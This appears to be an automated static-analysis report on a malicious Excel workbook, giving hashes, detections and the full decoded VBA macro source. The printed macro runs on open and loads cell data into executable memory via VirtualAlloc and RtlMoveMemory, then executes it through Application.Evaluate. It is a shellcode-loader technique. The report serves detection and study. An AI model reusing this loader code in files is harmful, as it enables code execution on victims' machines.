Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b0e22954b3ec6d42…

MALICIOUS

Office (OOXML)

16.2 KB Created: 2021-10-18 14:56:53 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-10-27
MD5: 542e140d3751807947f182fde86bd36b SHA-1: aa217d9570d7885b3e68ef804250d33678eea142 SHA-256: b0e22954b3ec6d427ccd28aa83b209b6f2b0f1c3ce9ef30da3a30f15e57729b3
164 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Office document containing multiple VBA macros (AutoOpen, Workbook_Open, Auto_Open) designed to execute code upon opening. The VBA script attempts to allocate memory and copy data into it, then uses Application.Evaluate with concatenated strings (p1 to p5, which are not fully defined in the provided snippet but likely form a command) to execute arbitrary code. This is a common technique for downloading and executing further malicious payloads.

Heuristics 5

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
    Sub AutoOpen()
            Auto_Open
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
            Auto_Open
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
            Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1627 bytes
SHA-256: 8d470090d5efe93eff5e66ab68114cb601053d3b8e83f8a9724d45315d9e8dcc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"


Function VBA_Evaluate(Input_String As String)
Application.Volatile
VBA_Evaluate = Application.Evaluate(Input_String)
End Function

Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long
#If VBA7 Then
        Dim Xlbufvetp As LongPtr
#Else
        Dim Xlbufvetp As Long
#End If
n = Range("A1", Range("A1").End(xlDown)).Rows.Count
   ReDim Hyeyhafxp(n)
   For i = 0 To n
      Hyeyhafxp(i) = Range("A1").Offset(i, 0)
   Next i
   

        Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
        For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
                Wyzayxya = Hyeyhafxp(Zolde)
                Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
        Next Zolde

        VBA_Evaluate (p1 & p2 & p3 & p4 & p5 & "(0, 0, " & Xlbufvetp & ", 0, 0, 0)")
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub





Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 19456 bytes
SHA-256: 96dae2fc1318a0f8a2092ecdafc04342178ae2a8e0e1507b9f0847f2df9f6808
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely